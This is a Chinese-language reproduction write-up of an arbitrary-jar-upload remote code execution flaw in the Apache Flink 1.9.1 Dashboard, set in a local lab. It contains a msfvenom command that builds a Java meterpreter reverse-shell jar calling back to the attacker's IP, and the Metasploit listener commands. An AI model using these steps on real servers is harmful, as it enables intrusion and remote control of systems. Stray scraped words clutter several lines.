Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現

0x00 簡介

Flink核心是一個流式的數據流執行引擎,其針對數據流的分佈式計算提供了數據分佈、數據通訊以及容錯機制等功能。基於流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分佈式任務。java

0x01 漏洞概述

攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的。shell

0x02 影響版本

至目前最新版本Apache Flink 1.9.1
漏洞危害: 高危apache

0x03 環境搭建

kali 192.168.115.43 受害機
win10 192.168.115.16 攻擊者
測試環境:Flink 1.9.1 java8+
Apache Flink 1.9.1安裝包下載tcp

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz分佈式

0x04 漏洞復現

1)tar -zxvf flink-1.9.1-bin-scala_2.11.tgz
2)到bin文件夾運行./start-cluster.sh


3)環境搭建成功 目標站點 http://127.0.0.1:8081
測試

4)生成jar後門包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.115.16 LPORT=2019 -f jar > sylon.jar
lua

5)攻擊機訪問目標站點 並上傳sylon.jar
scala

6)配置監聽
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 192.168.115.16
set LPORT 2019
show options
run3d

7)漏洞觸發

blog

0x05 修復方案

等待官網更新補丁或等待官網出最新版本後及時更新

0x06 參考文檔

https://mp.weixin.qq.com/s/HTFDYWlXfYe7fyGNJVwpSw

相關文章
相關標籤/搜索